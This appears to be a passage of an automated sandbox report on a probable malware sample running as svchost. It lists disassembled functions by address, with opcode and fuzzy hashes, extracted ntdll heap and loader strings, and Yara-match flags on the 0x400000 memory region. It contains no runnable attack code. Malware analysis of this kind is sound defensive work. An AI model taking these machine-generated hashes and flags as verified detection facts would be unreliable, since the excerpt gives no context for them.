                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      • API String ID: 0-2586055223
                                                                                                                      • Opcode ID: 1c8113768894e72133af1a2574a664d76bb0cfcf90c8ef42c6660ff421fa2eb4
                                                                                                                      • Instruction ID: d180127cef05f91151ad83c5b2dbd78a9198fe88a3cca21e84b3e0846921b308
                                                                                                                      • Opcode Fuzzy Hash: 1c8113768894e72133af1a2574a664d76bb0cfcf90c8ef42c6660ff421fa2eb4
                                                                                                                      • Instruction Fuzzy Hash: 75611176205780AFE721EB28CCC4F6BBBE8EF80B14F080468F9558B691D774E941CB61
                                                                                                                      Function 00402A80 Relevance: 5.2, Strings: 4, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /-Z6$Z6$gfff$yxxx
                                                                                                                      • API String ID: 0-2134535016
                                                                                                                      • Opcode ID: 0c2f7f8cc932e217aeb399f75c3e46d6108475fa52aaab964b5cd4e6bbc7781a
                                                                                                                      • Instruction ID: 75f38e25da97bed8b5fda18b674ef81a0890c3c832051e91a6218644b99217ee
                                                                                                                      • Opcode Fuzzy Hash: 0c2f7f8cc932e217aeb399f75c3e46d6108475fa52aaab964b5cd4e6bbc7781a
                                                                                                                      • Instruction Fuzzy Hash: A6510631B001194BDB18CD5DCED926EB3B5EB94304F58817BD909EF3C1E6B8ED118A84
                                                                                                                      Function 00402EB0 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Se$gfff$gfff$sHM
                                                                                                                      • API String ID: 0-1194513651
                                                                                                                      • Opcode ID: 8785826cf397595877ad37e6f67342aac8565dcf7c8cb5fd9507b0a72b0abd07
                                                                                                                      • Instruction ID: 080421c851c5c2c1fc1ea3d248e807c0b08c5dac9c5fd2ef45f9285b7bd5bf9b
                                                                                                                      • Opcode Fuzzy Hash: 8785826cf397595877ad37e6f67342aac8565dcf7c8cb5fd9507b0a72b0abd07
                                                                                                                      • Instruction Fuzzy Hash: E6416A31A0015A07C71C8D1D8D953E9BA66EBE4344F1C82BEDE89DF3C6D4B99E4153C4
                                                                                                                      Function 00402A7C Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /-Z6$Z6$gfff$yxxx
                                                                                                                      • API String ID: 0-2134535016
                                                                                                                      • Opcode ID: 35e3ea5645e49782e89653f2d606d12ae6b1fac0d6d90fc574b4f3845189cb26
                                                                                                                      • Instruction ID: 5e19db1351577ef402004d1d19b666f01859ca368cb2e19accac64d9f09c0d0e
                                                                                                                      • Opcode Fuzzy Hash: 35e3ea5645e49782e89653f2d606d12ae6b1fac0d6d90fc574b4f3845189cb26
                                                                                                                      • Instruction Fuzzy Hash: 9C410A31F001194BCB18CD5DCED915EB7B1AB94304F58817AD805EF3D2EAB8AD118B84
                                                                                                                      Function 033E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      • API String ID: 0-336120773
                                                                                                                      • Opcode ID: 2ab50f0c323ec2b9b998b08abc03aaf3b32de349c957c74fa091a1a5318dd42d
                                                                                                                      • Instruction ID: 9019c2949945e66f219c7e1770e50127773442cae8f3faa28bc4b4c5d6625c2d
                                                                                                                      • Opcode Fuzzy Hash: 2ab50f0c323ec2b9b998b08abc03aaf3b32de349c957c74fa091a1a5318dd42d
                                                                                                                      • Instruction Fuzzy Hash: 1731CD3AA10220EFD721EB98CCD5FAAB7E8EF09B64F180155F411DB2D1E671EC40DA65
                                                                                                                      Function 03329148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      • API String ID: 0-1391187441
                                                                                                                      • Opcode ID: e86367ddee59dc07c200fb3ccd04c75dfee9f9388c5c65ebcdfd99c1a40813dc
                                                                                                                      • Instruction ID: 359dc0762c748fa4b4a3fb438f5fa8ea0f5cde95b84efe3f86e544a1416edf02
                                                                                                                      • Opcode Fuzzy Hash: e86367ddee59dc07c200fb3ccd04c75dfee9f9388c5c65ebcdfd99c1a40813dc
                                                                                                                      • Instruction Fuzzy Hash: 1A318F36A00215EFDB11EB5ACCC5FAEFBB9EF45A20F144055E814AB291D774ED40CA61
                                                                                                                      Function 033429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 03343264
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0334327D
                                                                                                                      • HEAP[%wZ]: , xrefs: 03343255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      • Opcode ID: 167cb0340314ecf68f0b94d0a9862fd5e5e7013abf5f1789229e9a3d5118f70a
                                                                                                                      • Instruction ID: 489df3a7527896e7d94f9fa158efdee14ae6b92118f5e99701c2b4c375a5fd0d
                                                                                                                      • Opcode Fuzzy Hash: 167cb0340314ecf68f0b94d0a9862fd5e5e7013abf5f1789229e9a3d5118f70a
                                                                                                                      • Instruction Fuzzy Hash: 7492CD74E042489FDB25CF68C880BAEBBF5FF09310F188499E899AB791D735A941CF50
                                                                                                                      Function 03341F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: e58a382366fd3cba241880d062777cbcc5468162187c6b9f0da21375f8ec75a4
                                                                                                                      • Instruction ID: 4ba70720d93717860a95d76c4b8fd47c6ecb6329b0fd379e50dc9d12cee3a7ab
                                                                                                                      • Opcode Fuzzy Hash: e58a382366fd3cba241880d062777cbcc5468162187c6b9f0da21375f8ec75a4
                                                                                                                      • Instruction Fuzzy Hash: 0A22FC70A00641DFEB26DF28C8D5B7AFBF9EF06704F18849AE4559B682D735E881CB50
                                                                                                                      Function 03340770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: 06e9ff1d01c8828b7802c2e200c60277573c7bd777bf448f5e042e25ac5b8862
                                                                                                                      • Instruction ID: 56d39ce6506a8d36bac4cbbd476e68f3ecd21ad452b811e989d4004100996f18
                                                                                                                      • Opcode Fuzzy Hash: 06e9ff1d01c8828b7802c2e200c60277573c7bd777bf448f5e042e25ac5b8862
                                                                                                                      • Instruction Fuzzy Hash: 6BF17434B00605DFEB29CF68C9C0B6AF7F9FB45300F1881A9E5569B691D734E981CB90
                                                                                                                      Function 03331460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 03331596
                                                                                                                      • HEAP[%wZ]: , xrefs: 03331712
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03331728
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: c4704bb4c9ea4d9045714375c8e3dfa8284e249bda9a3d2b07d9161a8d71ef6b
                                                                                                                      • Instruction ID: e410e44737c264e407f6e93c074956135f160e67bbb2961c2cb470e9d5df25df
                                                                                                                      • Opcode Fuzzy Hash: c4704bb4c9ea4d9045714375c8e3dfa8284e249bda9a3d2b07d9161a8d71ef6b
                                                                                                                      • Instruction Fuzzy Hash: 03E10034E046419FDB29EF68C8D1B7ABBF9AF46300F18C55DE8968B245D734E940CB50
                                                                                                                      Function 033B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      • API String ID: 0-2391371766
                                                                                                                      • Opcode ID: 776a8dcba37f03dbb98763d24f50f2e3cd57a6456a6b3ed32e7eb0c84b675471
                                                                                                                      • Instruction ID: 45ddbaf415ff3d59a107d2c734ae393261b775cc49ecaae9bcdf6d416ff57ca2
                                                                                                                      • Opcode Fuzzy Hash: 776a8dcba37f03dbb98763d24f50f2e3cd57a6456a6b3ed32e7eb0c84b675471
                                                                                                                      • Instruction Fuzzy Hash: DCB19D79A05351AFD321DE54CCC0FABB7F8EB44720F554929FA50AB650D7B4E804CB92
                                                                                                                      Function 004026F0 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a```$gfff${
                                                                                                                      • API String ID: 0-4226493348
                                                                                                                      • Opcode ID: 978ccecd94f3287fcfc8b6587430c4bcd4e59a3cd1eecf122ddb2e14aa381851
                                                                                                                      • Instruction ID: 9a9d6a36eb07e83260b09142a6e81750081043ff6d9c479a1d1f117a63a83d98
                                                                                                                      • Opcode Fuzzy Hash: 978ccecd94f3287fcfc8b6587430c4bcd4e59a3cd1eecf122ddb2e14aa381851
                                                                                                                      • Instruction Fuzzy Hash: 6E91D472B0041947DB1C8D5DCE9466AB3A2EBD4314F28827BED19EF3C1E678DE018784
                                                                                                                      Function 03356962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 0-1077428164
                                                                                                                      • Opcode ID: 7ba3a604780c3f920e20f5e58f2069300e58ac3080f813da07f4ceb7fd55719b
                                                                                                                      • Instruction ID: 7d01ec976bcdb658a56db9ec824af70dd7cb68315e14030d886f7affc6edb951
                                                                                                                      • Opcode Fuzzy Hash: 7ba3a604780c3f920e20f5e58f2069300e58ac3080f813da07f4ceb7fd55719b
                                                                                                                      • Instruction Fuzzy Hash: 1AC26D71A083419FEB25CF24C881FABB7E9AF88754F08996DF989C7250D734D845CB92
                                                                                                                      Function 0332A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: 96b0563daffa0fc3b3cdf67ac0cc67bebf2cb7890de8c6165d2ce0fb199dda0a
                                                                                                                      • Instruction ID: 06757ce57992ff9c194105ec71145e517b3f8cee10da5fc296a25865d2156a9e
                                                                                                                      • Opcode Fuzzy Hash: 96b0563daffa0fc3b3cdf67ac0cc67bebf2cb7890de8c6165d2ce0fb199dda0a
                                                                                                                      • Instruction Fuzzy Hash: 4FA14875D012299BDB31EB24CCC8BAAF7B8EB44710F1401E9E909AB250D7359EC5CF60
                                                                                                                      Function 033C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      • API String ID: 0-318774311
                                                                                                                      • Opcode ID: 8342ad449a95a8a93f5036a00877cf032035c7dfe7eb77f647303487df4d4486
                                                                                                                      • Instruction ID: 4ba83dd8d89f6877360fe1fc1e623970b9e4e25b39d7425024fdbcf639680131
                                                                                                                      • Opcode Fuzzy Hash: 8342ad449a95a8a93f5036a00877cf032035c7dfe7eb77f647303487df4d4486
                                                                                                                      • Instruction Fuzzy Hash: D2817D79618380AFD721DB14C884B6AB7E8FF85760F08892DF9919B390D778DD04CB52
                                                                                                                      Function 0336909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      • API String ID: 0-1537733988
                                                                                                                      • Opcode ID: cddc0990160bcd567719601b2f90513b87ba562fcace2752c8286957efe683fb
                                                                                                                      • Instruction ID: aa32f27bfa37435297e8c56f1f2176c16f81bc472ff90af8381577af90e76b0a
                                                                                                                      • Opcode Fuzzy Hash: cddc0990160bcd567719601b2f90513b87ba562fcace2752c8286957efe683fb
                                                                                                                      • Instruction Fuzzy Hash: A871C0745087059FD714DF24C9C0B2BFBE9FF85618F24891EE49A9B698C730D805CB92
                                                                                                                      Function 0340B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • GlobalizationUserSettings, xrefs: 0340B834
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0340B82A
                                                                                                                      • TargetNtPath, xrefs: 0340B82F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      • API String ID: 0-505981995
                                                                                                                      • Opcode ID: 2c9207f034a22159fda3e7fe5228fa514da1838942d00d5b9a7857ea8d1b72f0
                                                                                                                      • Instruction ID: bc6aca04c90e4187c62e488bbda054389fb1ef448a6bffef1cb1ab990a083af0
                                                                                                                      • Opcode Fuzzy Hash: 2c9207f034a22159fda3e7fe5228fa514da1838942d00d5b9a7857ea8d1b72f0
                                                                                                                      • Instruction Fuzzy Hash: 9C616775E41229ABDB21DB54CC88BD9B7B8EB14710F0101E6E508AB350D774DE80CF98
                                                                                                                      Function 0332F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 0338E6B3
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0338E6C6
                                                                                                                      • HEAP[%wZ]: , xrefs: 0338E6A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      • API String ID: 0-1340214556
                                                                                                                      • Opcode ID: cd70d88e3764d0d04110e584687772def27fe1271269c178b1ccb0a89cb2f2d4
                                                                                                                      • Instruction ID: 3456abe7507966716ac2a72129b28a4d77ff92b7194c9c96195dd8ac77b482e4
                                                                                                                      • Opcode Fuzzy Hash: cd70d88e3764d0d04110e584687772def27fe1271269c178b1ccb0a89cb2f2d4
                                                                                                                      • Instruction Fuzzy Hash: 8851D435604754EFE722EBA8C8D4BAAFBF8FF05700F0800A5E9519B692D774E950CB50
                                                                                                                      Function 033DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 033DDC1F
                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 033DDC32
                                                                                                                      • HEAP[%wZ]: , xrefs: 033DDC12
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                      • API String ID: 0-3815128232
                                                                                                                      • Opcode ID: 109bb74a2de1b363d24d0116384cde41928ed2f93545173682e85f41fd43bf5f
                                                                                                                      • Instruction ID: 540fc2a11b407c1fb82eae1a82b4c2beaa3d23e5e761d9f3b5fb46a515cdaedf
                                                                                                                      • Opcode Fuzzy Hash: 109bb74a2de1b363d24d0116384cde41928ed2f93545173682e85f41fd43bf5f
                                                                                                                      • Instruction Fuzzy Hash: 685148371042508EE374DF2AE8C4772B7E9EF45248F08888AE4D28FA85D275D806DB60
                                                                                                                      Function 0336C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 033A82E8
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 033A82D7
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 033A82DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: fbc2c4d26d12eb6d9f04bf447ea6f3c1ef5c7623a6ab09972a9a825c8039ccda
                                                                                                                      • Instruction ID: 74228bd0499ae2c7e4f60b382d565cce3267be1a2219a361a66d86c80947f83a
                                                                                                                      • Opcode Fuzzy Hash: fbc2c4d26d12eb6d9f04bf447ea6f3c1ef5c7623a6ab09972a9a825c8039ccda
                                                                                                                      • Instruction Fuzzy Hash: 1841A2B5944314AFC720EB64DCC4B5BBBE8EF44650F45892AF988EB264E774E8108B91
                                                                                                                      Function 033EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 033EC1F1
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 033EC1C5
                                                                                                                      • PreferredUILanguages, xrefs: 033EC212
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: d10e0a76ccebc4949008c7787d81b2fd3bd15901b40fbb296bfe0b00f850a261
                                                                                                                      • Instruction ID: 1ee372787432c25b1cab75461132cef5a3147dca272914857840aaf40d419699
                                                                                                                      • Opcode Fuzzy Hash: d10e0a76ccebc4949008c7787d81b2fd3bd15901b40fbb296bfe0b00f850a261
                                                                                                                      • Instruction Fuzzy Hash: 3A417C76E00229EBDF11DBD8CCC1FEEB7BCAB14700F04406AE905BB2A0D7749A448B90
                                                                                                                      Function 033C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      • Opcode ID: e31b3f59ebfb492ea702119091ca60c40dd591645f9b4a99cc1c710ebdfeb996
                                                                                                                      • Instruction ID: 7de133ac2990ddf26abf82d824d7f7ba19b1975d942a1bff0c4afc4a800765af
                                                                                                                      • Opcode Fuzzy Hash: e31b3f59ebfb492ea702119091ca60c40dd591645f9b4a99cc1c710ebdfeb996
                                                                                                                      • Instruction Fuzzy Hash: 5341DE759243888BEB26DBA6CCA1BADBBB8EF55340F18045ED841AF691DA349D01CB10
                                                                                                                      Function 033B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 033B4899
                                                                                                                      • LdrpCheckRedirection, xrefs: 033B488F
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 033B4888
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: 6925c07c72ac225d30b8312ef39ac02b8e4b05a620c4517667373a8961d1834c
                                                                                                                      • Instruction ID: 31bec482ffce190502f50feb52b0ef322f466dc9cc07590085896691c9391bcb
                                                                                                                      • Opcode Fuzzy Hash: 6925c07c72ac225d30b8312ef39ac02b8e4b05a620c4517667373a8961d1834c
                                                                                                                      • Instruction Fuzzy Hash: 7541F832A007509FCB21CE1AD8C1AA6B7F8EF89650F090599FE58EBB53D731D800CB95
                                                                                                                      Function 033633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 033A29FE
                                                                                                                      • RtlCreateActivationContext, xrefs: 033A29F9
                                                                                                                      • Actx , xrefs: 033633AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                      • API String ID: 0-859632880
                                                                                                                      • Opcode ID: 7b0c168c4aa6fcc2be126ad61cf3ddbfa5c418b48f2d0d6ddfac75886a85030c
                                                                                                                      • Instruction ID: 2cdbc1ea8861c72680e3af7fc15842a6aaf346605b473f2224203352e09d3083
                                                                                                                      • Opcode Fuzzy Hash: 7b0c168c4aa6fcc2be126ad61cf3ddbfa5c418b48f2d0d6ddfac75886a85030c
                                                                                                                      • Instruction Fuzzy Hash: B53116366007059FDB26DF58CCC0B96B7A8FB44720F198469ED05DF2A5CB70E891CB90
                                                                                                                      Function 03361607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 033A1A51
                                                                                                                      • LdrpInitializeTls, xrefs: 033A1A47
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 033A1A40
                                                                                                                      Memory Dump Source
